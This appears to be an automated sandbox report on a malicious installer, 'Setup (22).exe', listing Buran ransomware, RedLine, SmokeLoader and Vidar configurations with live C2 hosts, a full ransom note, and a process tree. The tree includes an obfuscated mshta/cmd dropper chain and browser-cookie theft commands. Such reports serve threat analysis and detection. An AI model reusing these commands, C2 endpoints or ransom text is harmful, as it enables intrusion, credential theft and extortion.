Resubmissions

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

Analysis

  • max time kernel
    1810s
  • max time network
    1823s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 15:04

General

  • Target

    Setup (22).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 590$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 1AE-8E9-731 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

21_8_r

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 22 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 14 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 26 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1952
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2532
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2512
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          PID:2704
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:5676
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2812
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2796
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1348
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1188
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:492
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:2356
                        • C:\Users\Admin\AppData\Roaming\watwccr
                          C:\Users\Admin\AppData\Roaming\watwccr
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:8784
                          • C:\Users\Admin\AppData\Roaming\watwccr
                            C:\Users\Admin\AppData\Roaming\watwccr
                            3⤵
                            • Suspicious behavior: MapViewOfSection
                            PID:1156
                        • C:\Users\Admin\AppData\Roaming\rbtwccr
                          C:\Users\Admin\AppData\Roaming\rbtwccr
                          2⤵
                            PID:8460
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 8460 -s 484
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:8808
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                              PID:704
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:7332
                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                2⤵
                                  PID:4856
                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  2⤵
                                    PID:6180
                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    2⤵
                                      PID:1100
                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      2⤵
                                        PID:7924
                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        2⤵
                                          PID:7588
                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          2⤵
                                            PID:2132
                                          • C:\Users\Admin\AppData\Roaming\watwccr
                                            C:\Users\Admin\AppData\Roaming\watwccr
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:4848
                                            • C:\Users\Admin\AppData\Roaming\watwccr
                                              C:\Users\Admin\AppData\Roaming\watwccr
                                              3⤵
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:6728
                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            2⤵
                                              PID:5640
                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              2⤵
                                                PID:3836
                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                2⤵
                                                  PID:8544
                                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  2⤵
                                                    PID:7056
                                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    2⤵
                                                      PID:4656
                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      2⤵
                                                        PID:8172
                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        2⤵
                                                          PID:7400
                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          2⤵
                                                            PID:6188
                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            2⤵
                                                              PID:6988
                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              2⤵
                                                                PID:6572
                                                              • C:\Users\Admin\AppData\Roaming\watwccr
                                                                C:\Users\Admin\AppData\Roaming\watwccr
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:6148
                                                                • C:\Users\Admin\AppData\Roaming\watwccr
                                                                  C:\Users\Admin\AppData\Roaming\watwccr
                                                                  3⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:6680
                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                2⤵
                                                                  PID:8424
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:68
                                                                • C:\Users\Admin\AppData\Local\Temp\Setup (22).exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Setup (22).exe"
                                                                  1⤵
                                                                  • Checks computer location settings
                                                                  • Modifies system certificate store
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4804
                                                                  • C:\Users\Admin\Documents\CReKes76Cu7QGo6GUISjGwVq.exe
                                                                    "C:\Users\Admin\Documents\CReKes76Cu7QGo6GUISjGwVq.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2040
                                                                    • C:\Users\Admin\Documents\CReKes76Cu7QGo6GUISjGwVq.exe
                                                                      C:\Users\Admin\Documents\CReKes76Cu7QGo6GUISjGwVq.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4208
                                                                  • C:\Users\Admin\Documents\X64CEYIhJUH5NQbE3uRPjme_.exe
                                                                    "C:\Users\Admin\Documents\X64CEYIhJUH5NQbE3uRPjme_.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1984
                                                                    • C:\Users\Admin\Documents\X64CEYIhJUH5NQbE3uRPjme_.exe
                                                                      C:\Users\Admin\Documents\X64CEYIhJUH5NQbE3uRPjme_.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4232
                                                                  • C:\Users\Admin\Documents\QjPSxquN6ktRMQkgMeBZgBjG.exe
                                                                    "C:\Users\Admin\Documents\QjPSxquN6ktRMQkgMeBZgBjG.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2292
                                                                  • C:\Users\Admin\Documents\glJg4D1ClslhkE7rXY6ciVuQ.exe
                                                                    "C:\Users\Admin\Documents\glJg4D1ClslhkE7rXY6ciVuQ.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2168
                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:2504
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:3292
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Windows directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3600
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:8876
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:8420
                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4652
                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:5008
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1148
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1804
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:5216
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:5560
                                                                          • C:\Windows\system32\WerFault.exe
                                                                            C:\Windows\system32\WerFault.exe -u -p 5008 -s 1568
                                                                            4⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:6064
                                                                      • C:\Users\Admin\Documents\pMvIygF8C9G0ygvJURBehzvq.exe
                                                                        "C:\Users\Admin\Documents\pMvIygF8C9G0ygvJURBehzvq.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2520
                                                                        • C:\Users\Admin\AppData\Roaming\1971623.exe
                                                                          "C:\Users\Admin\AppData\Roaming\1971623.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1220
                                                                        • C:\Users\Admin\AppData\Roaming\4650079.exe
                                                                          "C:\Users\Admin\AppData\Roaming\4650079.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          PID:2260
                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4712
                                                                        • C:\Users\Admin\AppData\Roaming\1221776.exe
                                                                          "C:\Users\Admin\AppData\Roaming\1221776.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:804
                                                                      • C:\Users\Admin\Documents\9jIHOf0QKgUbLQQUxxSH6km8.exe
                                                                        "C:\Users\Admin\Documents\9jIHOf0QKgUbLQQUxxSH6km8.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:2568
                                                                        • C:\Users\Admin\Documents\9jIHOf0QKgUbLQQUxxSH6km8.exe
                                                                          "C:\Users\Admin\Documents\9jIHOf0QKgUbLQQUxxSH6km8.exe" -q
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:4204
                                                                      • C:\Users\Admin\Documents\2FjoB0dK7OTdyt0F8Ki4RdFL.exe
                                                                        "C:\Users\Admin\Documents\2FjoB0dK7OTdyt0F8Ki4RdFL.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:2564
                                                                      • C:\Users\Admin\Documents\5B7Vnckp6qunXV3wh8O0Vk1l.exe
                                                                        "C:\Users\Admin\Documents\5B7Vnckp6qunXV3wh8O0Vk1l.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:2096
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 484
                                                                          3⤵
                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                          • Program crash
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4828
                                                                      • C:\Users\Admin\Documents\kAm8372RSqCBdTJJVTwnvXhN.exe
                                                                        "C:\Users\Admin\Documents\kAm8372RSqCBdTJJVTwnvXhN.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4072
                                                                        • C:\Users\Admin\Documents\kAm8372RSqCBdTJJVTwnvXhN.exe
                                                                          "C:\Users\Admin\Documents\kAm8372RSqCBdTJJVTwnvXhN.exe"
                                                                          3⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:9056
                                                                      • C:\Users\Admin\Documents\rwFOgM3b6aLD0i8I9HtMTxIv.exe
                                                                        "C:\Users\Admin\Documents\rwFOgM3b6aLD0i8I9HtMTxIv.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4060
                                                                      • C:\Users\Admin\Documents\vStVlxMbHcDRXVONJlei93c0.exe
                                                                        "C:\Users\Admin\Documents\vStVlxMbHcDRXVONJlei93c0.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3880
                                                                      • C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe
                                                                        "C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:3644
                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                          3⤵
                                                                            PID:4848
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\mEb5UpKzmWnJAl6dZ6FqoCaU.exe" ) do taskkill -f -iM "%~NxA"
                                                                              4⤵
                                                                                PID:1236
                                                                                • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                  hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1004
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                    6⤵
                                                                                      PID:4920
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                        7⤵
                                                                                          PID:5304
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                        6⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:5324
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill -f -iM "mEb5UpKzmWnJAl6dZ6FqoCaU.exe"
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:2148
                                                                              • C:\Users\Admin\Documents\7dz36CZiS6KAM95dpXH32YXb.exe
                                                                                "C:\Users\Admin\Documents\7dz36CZiS6KAM95dpXH32YXb.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:3308
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 760
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:4888
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 784
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2368
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 812
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1808
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 824
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:4888
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 956
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1208
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 984
                                                                                  3⤵
                                                                                  • Program crash
